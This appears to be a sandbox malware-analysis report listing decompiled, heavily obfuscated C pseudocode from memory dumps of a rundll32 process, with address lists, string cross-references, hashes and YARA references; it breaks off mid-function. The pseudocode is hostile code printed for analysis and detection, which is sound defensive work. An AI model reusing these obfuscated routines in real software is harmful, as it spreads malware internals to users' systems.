				_v1116 = _v1116 ^ 0x33332c42;
				do {
					while(_t229 != 0xe952e95) {
						if(_t229 == 0x1126b32b) {
							_push(0x1f1000);
							_push(_v1128);
							E002063BF(E0020BF25(_v1064, _v1072, __eflags), __eflags, _v1112, _v1100,  &_v1040,  *0x2121b0, _v1104,  *0x2121b0 + 0x234,  *0x2121b0 + 0x10, _v1080);
							E0020C5F7(_v1084, _v1092, _v1056, _v1132, _t217);
							_t266 =  &(_t266[0xb]);
							_t229 = 0xe952e95;
							continue;
						} else {
							if(_t229 == 0x2ea5cfd6) {
								E001F8C0C(_v1096, __eflags, _v1120, _v1088,  &_v520);
								_t266 =  &(_t266[3]);
								_t229 = 0x1126b32b;
								continue;
							} else {
								if(_t229 == 0x3423edaf) {
									E0020654F(_v1068, _v1108, _v1116,  &_v1040);
								} else {
									if(_t229 != 0x3abfade2) {
										goto L10;
									} else {
										_t229 = 0x2ea5cfd6;
										continue;
									}
								}
							}
						}
						L13:
						return _t258;
					}
					_t216 = E00203D7C( &_v1040, __eflags, _v1076, _v1060,  &_v520);
					_t266 =  &(_t266[3]);
					__eflags = _t216;
					_t258 =  !=  ? 1 : _t258;
					_t229 = 0x3423edaf;
					L10:
					__eflags = _t229 - 0x8af5a53;
				} while (__eflags != 0);
				goto L13;
			}

0x0020b3fe
0x0020b404
0x0020b40e
0x0020b416
0x0020b41f
0x0020b421
0x0020b425
0x0020b42d
0x0020b432
0x0020b43a
0x0020b442
0x0020b44a
0x0020b452
0x0020b45a
0x0020b462
0x0020b46a
0x0020b472
0x0020b47a
0x0020b47f
0x0020b487
0x0020b48f
0x0020b494
0x0020b49c
0x0020b4aa
0x0020b4af
0x0020b4b5
0x0020b4bd
0x0020b4c5
0x0020b4ca
0x0020b4d2
0x0020b4da
0x0020b4e2
0x0020b4ea
0x0020b4f2
0x0020b4f7
0x0020b4ff
0x0020b507
0x0020b514
0x0020b515
0x0020b519
0x0020b51e
0x0020b526
0x0020b52e
0x0020b536
0x0020b53e
0x0020b546
0x0020b54e
0x0020b55c
0x0020b560
0x0020b565
0x0020b56d
0x0020b575
0x0020b57d
0x0020b585
0x0020b58d
0x0020b595
0x0020b59d
0x0020b5a5
0x0020b5ad
0x0020b5b2
0x0020b5ba
0x0020b5c2
0x0020b5ca
0x0020b5cf
0x0020b5d7
0x0020b5df
0x0020b5e7
0x0020b5ef
0x0020b5f7
0x0020b5ff
0x0020b609
0x0020b621
0x0020b626
0x0020b62c
0x0020b631
0x0020b639
0x0020b646
0x0020b649
0x0020b64d
0x0020b655
0x0020b65d
0x0020b66d
0x0020b671
0x0020b679
0x0020b681
0x0020b689
0x0020b691
0x0020b699
0x0020b6a1
0x0020b6a9
0x0020b6ae
0x0020b6b6
0x0020b6be
0x0020b6c6
0x0020b6d2
0x0020b6d5
0x0020b6d9
0x0020b6e1
0x0020b6e1
0x0020b6ef
0x0020b731
0x0020b736
0x0020b77b
0x0020b794
0x0020b799
0x0020b79c
0x00000000
0x0020b6f1
0x0020b6f3
0x0020b725
0x0020b72a
0x0020b72d
0x00000000
0x0020b6f5
0x0020b6fb
0x0020b7f2
0x0020b701
0x0020b707
0x00000000
0x0020b70d
0x0020b70d
0x00000000
0x0020b70d
0x0020b707
0x0020b6fb
0x0020b6f3
0x0020b7f9
0x0020b805
0x0020b805
0x0020b7be
0x0020b7c5
0x0020b7c9
0x0020b7cb
0x0020b7ce
0x0020b7d3
0x0020b7d3
0x0020b7d3
0x00000000

Strings

{>, xrefs: 0020B425
Uo8@, xrefs: 0020B472
82, xrefs: 0020B4D2
X8, xrefs: 0020B5EF
&T, xrefs: 0020B585
7H, xrefs: 0020B639
., xrefs: 0020B4B5
Xp, xrefs: 0020B507
|(, xrefs: 0020B565
B,33, xrefs: 0020B6D9
?*, xrefs: 0020B40E

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &T$7H$82$B,33$Uo8@$X8$Xp${>$|($.$?*
API String ID: 0-2199102758
Opcode ID: c4cca9baaf10fc53ad01f2219dfc6934e79513d924f77d20dd3e57cf7b2ffc3b
Instruction ID: e5c1ef024b21082f6fb3938ae789b428f065c5f3f013294b95ac9f3bfadc91e9
Opcode Fuzzy Hash: c4cca9baaf10fc53ad01f2219dfc6934e79513d924f77d20dd3e57cf7b2ffc3b
Instruction Fuzzy Hash: 06A140B25183819FE3A8CF24C88941BBBF1FBC4358F504A1DF596962A0D7B5CA59CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00206B45, Relevance: 12.9, Strings: 10, Instructions: 362
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00206B45() {
				void* _t369;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t374;
				signed int _t376;
				signed int _t378;
				signed int _t383;
				signed int _t389;
				void* _t395;
				signed int _t431;
				signed int _t432;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t442;
				void* _t446;

				 *((intOrPtr*)(_t446 + 0xa4)) = 0x772f9f;
				 *(_t446 + 0xac) = 0;
				 *(_t446 + 0xa8) = 0x789ddf;
				_t395 = 0x19391156;
				 *(_t446 + 0x6c) = 0xa1c8;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) << 0xd;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) ^ 0x14390001;
				 *(_t446 + 0xc) = 0xff4b;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x5146fe6d;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x6d1dcf2b;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) >> 5;
				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x01e2de71;
				 *(_t446 + 0x14) = 0x3f5c;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) | 0xe97d3723;
				 *(_t446 + 0xa0) = 0;
				_t22 = _t446 + 0x14; // 0xe97d3723
				 *(_t446 + 0x24) =  *_t22 * 0x76;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) >> 7;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x013f0ad7;
				 *(_t446 + 0x58) = 0x736e;
				 *(_t446 + 0x58) =  *(_t446 + 0x58) >> 1;
				_t435 = 0x7c;
				 *(_t446 + 0x5c) =  *(_t446 + 0x58) * 0x3a;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) ^ 0x000d12ba;
				 *(_t446 + 0xac) = 0xcefa;
				 *(_t446 + 0xac) =  *(_t446 + 0xac) | 0xd3773184;
				 *(_t446 + 0xac) =  *(_t446 + 0xac) ^ 0xd377a5bb;
				 *(_t446 + 0x14) = 0xdd96;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) + 0xffffff88;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) ^ 0x5290399f;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) << 0xd;
				 *(_t446 + 0x14) =  *(_t446 + 0x14) ^ 0x1c901162;
				 *(_t446 + 0x74) = 0x655b;
				 *(_t446 + 0x74) =  *(_t446 + 0x74) | 0xcd9490d8;
				 *(_t446 + 0x74) =  *(_t446 + 0x74) ^ 0xcd94b23a;
				 *(_t446 + 0xa0) = 0x6c7f;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x13eba5b2;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x13ebbb7e;
				 *(_t446 + 0x94) = 0x7a54;
				 *(_t446 + 0x94) =  *(_t446 + 0x94) / _t435;
				 *(_t446 + 0x94) =  *(_t446 + 0x94) ^ 0x00007779;
				 *(_t446 + 0x4c) = 0xc640;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) >> 5;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) ^ 0x0a555cb4;
				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) ^ 0x0a557f70;
				 *(_t446 + 0x38) = 0x22ba;
				_t436 = 0x67;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) / _t436;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) >> 5;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) + 0x267c;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0x00005dad;
				 *(_t446 + 0xb0) = 0x929;
				 *(_t446 + 0xb0) =  *(_t446 + 0xb0) + 0xffff6954;
				 *(_t446 + 0xb0) =  *(_t446 + 0xb0) ^ 0xffff7ae2;
				 *(_t446 + 0x18) = 0xce9e;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) + 0xffff0e6b;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) | 0x6011ff3c;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) << 0xc;
				 *(_t446 + 0x18) =  *(_t446 + 0x18) ^ 0xfff39ad2;
				 *(_t446 + 0x70) = 0xb975;
				_t431 = 0x16;
				 *(_t446 + 0x6c) =  *(_t446 + 0x70) / _t431;
				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) ^ 0x00003cc7;
				 *(_t446 + 0x64) = 0x8a7;
				_t437 = 0x17;
				 *(_t446 + 0x68) =  *(_t446 + 0x64) / _t437;
				 *(_t446 + 0x68) =  *(_t446 + 0x68) + 0x9f8;
				 *(_t446 + 0x68) =  *(_t446 + 0x68) ^ 0x00004bf2;
				 *(_t446 + 0xa8) = 0x9dab;
				 *(_t446 + 0xa8) =  *(_t446 + 0xa8) >> 3;
				 *(_t446 + 0xa8) =  *(_t446 + 0xa8) ^ 0x00004fe2;
				 *(_t446 + 0x8c) = 0xe61d;
				_t438 = 0x51;
				 *(_t446 + 0x8c) =  *(_t446 + 0x8c) * 0x24;
				 *(_t446 + 0x8c) =  *(_t446 + 0x8c) ^ 0x00200b54;
				 *(_t446 + 0x48) = 0x4300;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) >> 0xb;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) << 0xd;
				 *(_t446 + 0x48) =  *(_t446 + 0x48) ^ 0x00016849;
				 *(_t446 + 0x44) = 0x14fb;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) >> 4;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) >> 3;
				 *(_t446 + 0x44) =  *(_t446 + 0x44) ^ 0x000014fe;
				 *(_t446 + 0x64) = 0x908d;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) + 0xda51;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) ^ 0x6d67fea7;
				 *(_t446 + 0x64) =  *(_t446 + 0x64) ^ 0x6d669443;
				 *(_t446 + 0x24) = 0x5ccc;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) * 0x61;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) / _t438;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x12e038eb;
				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x12e0646f;
				 *(_t446 + 0x78) = 0x27f;
				 *(_t446 + 0x78) =  *(_t446 + 0x78) << 9;
				 *(_t446 + 0x78) =  *(_t446 + 0x78) ^ 0x0004fb39;
				 *(_t446 + 0x1c) = 0x6d1d;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) >> 9;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) + 0xb85e;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) ^ 0xaa7cb7d8;
				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) ^ 0xaa7c6457;
				 *(_t446 + 0x54) = 0x7318;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) >> 0xd;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) + 0xffff7495;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) ^ 0xffff5a53;
				 *(_t446 + 0x90) = 0xb397;
				 *(_t446 + 0x90) =  *(_t446 + 0x90) + 0x578a;
				 *(_t446 + 0x90) =  *(_t446 + 0x90) ^ 0x00016114;
				 *(_t446 + 0x34) = 0xd228;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) >> 4;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) ^ 0x6376bfe7;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) << 0xe;
				 *(_t446 + 0x34) =  *(_t446 + 0x34) ^ 0xacb136be;
				 *(_t446 + 0x88) = 0x4cf0;
				 *(_t446 + 0x88) =  *(_t446 + 0x88) + 0xaecf;
				 *(_t446 + 0x88) =  *(_t446 + 0x88) ^ 0x0000fedc;
				 *(_t446 + 0x2c) = 0x629e;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) + 0xd78b;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) + 0x81bf;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) << 0xf;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) ^ 0xddf43aaf;
				 *(_t446 + 0x98) = 0xefe2;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) << 4;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) ^ 0x000efba1;
				 *(_t446 + 0x50) = 0xde18;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) + 0x6327;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) | 0xdc33595a;
				 *(_t446 + 0x50) =  *(_t446 + 0x50) ^ 0xdc335491;
				 *(_t446 + 0x7c) = 0xe244;
				 *(_t446 + 0x7c) =  *(_t446 + 0x7c) ^ 0x4f81d147;
				 *(_t446 + 0x7c) =  *(_t446 + 0x7c) ^ 0x4f817701;
				 *(_t446 + 0x9c) = 0xcfc5;
				_t439 = 0x13;
				_t444 =  *(_t446 + 0x68);
				 *(_t446 + 0x98) =  *(_t446 + 0x9c) / _t439;
				 *(_t446 + 0x98) =  *(_t446 + 0x98) ^ 0x00007994;
				 *(_t446 + 0xa0) = 0xdcf0;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) >> 5;
				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x00004aa7;
				 *(_t446 + 0x80) = 0xb565;
				 *(_t446 + 0x80) =  *(_t446 + 0x80) | 0xd87788ca;
				 *(_t446 + 0x80) =  *(_t446 + 0x80) ^ 0xd877c5fd;
				 *(_t446 + 0x38) = 0x6376;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0xd60ebee2;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) + 0xdd50;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0x3a07644d;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0xec08a801;
				 *(_t446 + 0x3c) = 0x1f0d;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) | 0xe9d4bb8b;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) ^ 0x531b6b57;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) ^ 0xbacf9971;
				 *(_t446 + 0x5c) = 0x2ec0;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) << 0xc;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) >> 0xe;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) ^ 0x00004eb6;
				 *(_t446 + 0x54) = 0xc421;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) + 0x4f00;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) >> 0xa;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) ^ 0x0000676b;
				 *(_t446 + 0x2c) = 0x5f98;
				_t393 =  *(_t446 + 0x68);
				_t432 =  *(_t446 + 0x68);
				_t440 =  *(_t446 + 0x68);
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) / _t431;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) << 0xc;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) * 0x50;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) ^ 0x15b80003;
				while(1) {
					L1:
					_t369 = 0x667bbe4;
					L2:
					while(_t395 != 0x333430e) {
						if(_t395 == _t369) {
							_t372 = E00206409( *(_t446 + 0x70),  *(_t446 + 0x90),  *(_t446 + 0x4c), _t432, _t395, _t440, _t446 + 0xc4,  *(_t446 + 0x94), _t395,  *((intOrPtr*)(_t446 + 0x84)),  *(_t446 + 0x24), _t393, _t395,  *(_t446 + 0x50));
							_t446 = _t446 + 0x30;
							__eflags = _t372;
							if(_t372 == 0) {
								_t373 =  *(_t446 + 0xb0);
							} else {
								_t442 = _t432;
								while(1) {
									__eflags =  *((intOrPtr*)(_t442 + 4)) - 4;
									if( *((intOrPtr*)(_t442 + 4)) != 4) {
										goto L19;
									}
									L18:
									_t335 = _t442 + 0xc; // 0x4bfe
									_t378 = E001FD867(_t444,  *(_t446 + 0x98), _t335,  *(_t446 + 0x38),  *(_t446 + 0x88),  *((intOrPtr*)(_t446 + 0x28)));
									_t446 = _t446 + 0x10;
									__eflags = _t378;
									if(_t378 == 0) {
										_t373 = 1;
										 *(_t446 + 0xb0) = 1;
									} else {
										goto L19;
									}
									L24:
									_t440 =  *(_t446 + 0x68);
									goto L25;
									L19:
									_t376 =  *_t442;
									__eflags = _t376;
									if(_t376 == 0) {
										_t373 =  *(_t446 + 0xb0);
									} else {
										_t442 = _t442 + _t376;
										__eflags =  *((intOrPtr*)(_t442 + 4)) - 4;
										if( *((intOrPtr*)(_t442 + 4)) != 4) {
											goto L19;
										}
									}
									goto L24;
								}
							}
							L25:
							__eflags = _t373;
							if(__eflags == 0) {
								_t369 = 0x667bbe4;
								_t395 = 0x667bbe4;
								continue;
							} else {
								_t374 =  *0x211404; // 0x0
								E00207309( *(_t446 + 0x94),  *(_t446 + 0x4c),  *_t374);
								_t395 = 0x3007dbb6;
								goto L1;
							}
							L31:
						} else {
							if(_t395 == 0x133ba569) {
								E001F8C0C( *((intOrPtr*)(_t446 + 0x30)), __eflags,  *((intOrPtr*)(_t446 + 0x60)),  *(_t446 + 0xac), _t446 + 0xc4);
								_t383 = E001F1E13( *((intOrPtr*)(_t446 + 0x28)),  *(_t446 + 0x88),  *(_t446 + 0xb0),  *(_t446 + 0xa0), _t446 + 0xd0);
								_t444 = _t383;
								_t446 = _t446 + 0x18;
								_t395 = 0x1f405b52;
								 *((short*)(_t383 - 2)) = 0;
								while(1) {
									L1:
									_t369 = 0x667bbe4;
									goto L2;
								}
							} else {
								if(_t395 == 0x1614145d) {
									_t440 = 0x1000;
									_push(_t395);
									 *(_t446 + 0x6c) = 0x1000;
									_t432 = E002057E8(0x1000);
									_t369 = 0x667bbe4;
									__eflags = _t432;
									_t395 =  !=  ? 0x667bbe4 : 0x333430e;
									continue;
								} else {
									if(_t395 == 0x19391156) {
										_t395 = 0x133ba569;
										continue;
									} else {
										if(_t395 == 0x1f405b52) {
											_t389 = E001F492A( *(_t446 + 0x5c),  *(_t446 + 0x4c) | 0x00000006,  *(_t446 + 0x74),  *(_t446 + 0x5c),  *((intOrPtr*)(_t446 + 0xd0)), _t395, 1,  *(_t446 + 0x2c), _t395, _t446 + 0xc8, 0x2000000,  *(_t446 + 0x74),  *(_t446 + 0x68),  *((intOrPtr*)(_t446 + 0xa4)));
											_t393 = _t389;
											_t446 = _t446 + 0x30;
											__eflags = _t389 - 0xffffffff;
											if(__eflags != 0) {
												_t395 = 0x1614145d;
												while(1) {
													L1:
													_t369 = 0x667bbe4;
													goto L2;
												}
											}
										} else {
											if(_t395 != 0x3007dbb6) {
												L29:
												__eflags = _t395 - 0x35dcba61;
												if(__eflags != 0) {
													continue;
												}
											} else {
												E001F91CD( *((intOrPtr*)(_t446 + 0x84)),  *((intOrPtr*)(_t446 + 0xa4)),  *(_t446 + 0xa8), _t432,  *(_t446 + 0x80));
												_t446 = _t446 + 0xc;
												_t395 = 0x333430e;
												while(1) {
													L1:
													_t369 = 0x667bbe4;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
						goto L31;
					}
					E001F78F0(_t393,  *(_t446 + 0x44),  *(_t446 + 0x44),  *((intOrPtr*)(_t446 + 0x60)),  *(_t446 + 0x54));
					_t446 = _t446 + 0xc;
					_t395 = 0x35dcba61;
					_t369 = 0x667bbe4;
					goto L29;
				}
			}

0x00206b4b
0x00206b58
0x00206b61
0x00206b6c
0x00206b71
0x00206b79
0x00206b7e
0x00206b86
0x00206b8e
0x00206b96
0x00206b9e
0x00206ba3
0x00206bab
0x00206bb3
0x00206bbb
0x00206bc2
0x00206bcb
0x00206bcf
0x00206bd4
0x00206bdc
0x00206be4
0x00206bef
0x00206bf2
0x00206bf6
0x00206bfe
0x00206c09
0x00206c14
0x00206c1f
0x00206c27
0x00206c2c
0x00206c34
0x00206c39
0x00206c41
0x00206c49
0x00206c51
0x00206c59
0x00206c64
0x00206c6f
0x00206c7a
0x00206c90
0x00206c97
0x00206ca2
0x00206caa
0x00206caf
0x00206cb7
0x00206cbf
0x00206ccb
0x00206cd0
0x00206cd6
0x00206cdb
0x00206ce3
0x00206ceb
0x00206cf6
0x00206d01
0x00206d0c
0x00206d14
0x00206d1c
0x00206d24
0x00206d29
0x00206d31
0x00206d3d
0x00206d40
0x00206d44
0x00206d4c
0x00206d5c
0x00206d61
0x00206d67
0x00206d6f
0x00206d77
0x00206d82
0x00206d8a
0x00206d95
0x00206da8
0x00206dab
0x00206db2
0x00206dbd
0x00206dc5
0x00206dca
0x00206dcf
0x00206dd7
0x00206ddf
0x00206de4
0x00206de9
0x00206df1
0x00206df9
0x00206e01
0x00206e09
0x00206e11
0x00206e1e
0x00206e28
0x00206e2c
0x00206e34
0x00206e3c
0x00206e44
0x00206e49
0x00206e51
0x00206e59
0x00206e5e
0x00206e66
0x00206e6e
0x00206e76
0x00206e7e
0x00206e83
0x00206e8b
0x00206e93
0x00206e9e
0x00206ea9
0x00206eb4
0x00206ebc
0x00206ec1
0x00206ec9
0x00206ece
0x00206ed6
0x00206ee1
0x00206eec
0x00206ef7
0x00206eff
0x00206f07
0x00206f0f
0x00206f14
0x00206f1c
0x00206f27
0x00206f2f
0x00206f3a
0x00206f42
0x00206f4a
0x00206f52
0x00206f5a
0x00206f62
0x00206f6a
0x00206f74
0x00206f86
0x00206f8b
0x00206f8f
0x00206f96
0x00206fa1
0x00206fac
0x00206fb4
0x00206fbf
0x00206fca
0x00206fd5
0x00206fe0
0x00206fe8
0x00206ff0
0x00206ff8
0x00207000
0x00207008
0x00207010
0x00207018
0x00207020
0x00207028
0x00207030
0x00207035
0x0020703a
0x00207042
0x0020704a
0x00207052
0x00207057
0x0020705f
0x0020706d
0x00207071
0x00207075
0x00207079
0x0020707d
0x00207087
0x0020708b
0x00207093
0x00207093
0x00207093
0x00000000
0x00207098
0x002070a6
0x00207232
0x00207237
0x0020723a
0x0020723c
0x00207284
0x0020723e
0x0020723e
0x00207240
0x00207240
0x00207244
0x00000000
0x00000000
0x00207246
0x0020724a
0x00207262
0x00207267
0x0020726a
0x0020726c
0x0020727a
0x0020727b
0x00000000
0x00000000
0x00000000
0x00207294
0x00207294
0x00000000
0x0020726e
0x0020726e
0x00207270
0x00207272
0x0020728d
0x00207274
0x00207274
0x00207240
0x00207244
0x00000000
0x00000000
0x00207244
0x00000000
0x00207272
0x00207240
0x00207298
0x00207298
0x0020729a
0x002072be
0x002072c3
0x00000000
0x0020729c
0x0020729c
0x002072ae
0x002072b4
0x00000000
0x002072b4
0x00000000
0x002070ac
0x002070b2
0x002071bf
0x002071e5
0x002071ea
0x002071ec
0x002071f1
0x002071f6
0x00207093
0x00207093
0x00207093
0x00000000
0x00207093
0x002070b8
0x002070be
0x00207179
0x00207185
0x00207188
0x00207191
0x00207193
0x00207199
0x002071a0
0x00000000
0x002070c4
0x002070ca
0x0020716b
0x00000000
0x002070d0
0x002070d6
0x0020714e
0x00207153
0x00207155
0x00207158
0x0020715b
0x00207161
0x00207093
0x00207093
0x00207093
0x00000000
0x00207093
0x00207093
0x002070d8
0x002070de
0x002072ee
0x002072ee
0x002072f4
0x00000000
0x00000000
0x002070e4
0x00207101
0x00207106
0x00207109
0x00207093
0x00207093
0x00207093
0x00000000
0x00207093
0x00207093
0x002070de
0x002070d6
0x002070ca
0x002070be
0x002070b2
0x002072fd
0x00207306
0x00000000
0x00207306
0x002072dc
0x002072e1
0x002072e4
0x002072e9
0x00000000
0x002072e9

Strings

yw, xrefs: 00206C97
ns, xrefs: 00206BDC
kg, xrefs: 00207057
vc, xrefs: 00206FE0
D, xrefs: 00206F5A
O, xrefs: 00206D8A
#7}, xrefs: 00206BC2
'c, xrefs: 00206F42
[e, xrefs: 00206C41
), xrefs: 00206CEB

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #7}$'c$)$D$[e$kg$ns$vc$yw$O
API String ID: 0-1013673946
Opcode ID: ce7db0c7f43385af17f0960ed1dfc5837a9ee8ed3b99f5bc43cc102c9edbfe24
Instruction ID: 88dbc439ac721a665339244d61cbc079e58d21fb4afb981b03283f29c7ff749f
Opcode Fuzzy Hash: ce7db0c7f43385af17f0960ed1dfc5837a9ee8ed3b99f5bc43cc102c9edbfe24
Instruction Fuzzy Hash: B602317151C3809FE3A8CF21C48AA5BFBE1BBC5758F10891DE5DA862A0D7B59909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002A60B9, Relevance: 12.9, Strings: 10, Instructions: 362COMMON

Download Yara Rule

Strings

kg, xrefs: 002A65CB
O, xrefs: 002A62FE
yw, xrefs: 002A620B
D, xrefs: 002A64CE
), xrefs: 002A625F
vc, xrefs: 002A6554
[e, xrefs: 002A61B5
#7}, xrefs: 002A6136
'c, xrefs: 002A64B6
ns, xrefs: 002A6150

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #7}$'c$)$D$[e$kg$ns$vc$yw$O
API String ID: 0-1013673946
Opcode ID: 75255d6528c26c6ddf6219830976a873fa11488c47811df6d3480e4dd2558721
Instruction ID: d0e5537ec423c04c97cc42a9242fad4916d7a4a4865124c35f8833fbf31b5d44
Opcode Fuzzy Hash: 75255d6528c26c6ddf6219830976a873fa11488c47811df6d3480e4dd2558721
Instruction Fuzzy Hash: FC0220711183809FE368CF21C48AA5BFBE1FBC5758F10891DE5DA862A0D7B99919CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001FC07D, Relevance: 12.8, Strings: 10, Instructions: 296
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E001FC07D(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _t249;
				intOrPtr _t273;
				intOrPtr _t275;
				void* _t292;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				intOrPtr* _t318;
				signed int _t319;
				intOrPtr* _t322;
				signed int* _t324;
				void* _t327;

				_push(_a8);
				_t322 = __edx;
				_t318 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t249);
				_v16 = 0x7669;
				_t324 =  &(( &_v120)[4]);
				_v16 = _v16 << 0xc;
				_v16 = _v16 ^ 0x0766ed4f;
				_t292 = 0;
				_v96 = 0xa3dc;
				_t319 = 0xc83da09;
				_v96 = _v96 << 0x10;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 ^ 0xd5d56a35;
				_v96 = _v96 ^ 0xd5c17d1d;
				_v88 = 0x57ea;
				_t294 = 0x44;
				_v88 = _v88 * 0x5e;
				_v88 = _v88 * 0x6d;
				_v88 = _v88 ^ 0xe3cf2272;
				_v88 = _v88 ^ 0xee71a60d;
				_v92 = 0x3245;
				_v92 = _v92 >> 9;
				_v92 = _v92 >> 7;
				_v92 = _v92 ^ 0xb732a7fa;
				_v92 = _v92 ^ 0xb732c7ae;
				_v40 = 0x3209;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 + 0xffff23da;
				_v40 = _v40 ^ 0xffff5649;
				_v44 = 0xfee;
				_v44 = _v44 * 0x3a;
				_v44 = _v44 + 0xffff023b;
				_v44 = _v44 ^ 0x00028194;
				_v20 = 0x6fe9;
				_v20 = _v20 ^ 0x83bafbf8;
				_v20 = _v20 ^ 0x83baebed;
				_v52 = 0x55fd;
				_v52 = _v52 >> 3;
				_v52 = _v52 / _t294;
				_v52 = _v52 ^ 0x00006fa3;
				_v56 = 0x7487;
				_t295 = 0x59;
				_v56 = _v56 / _t295;
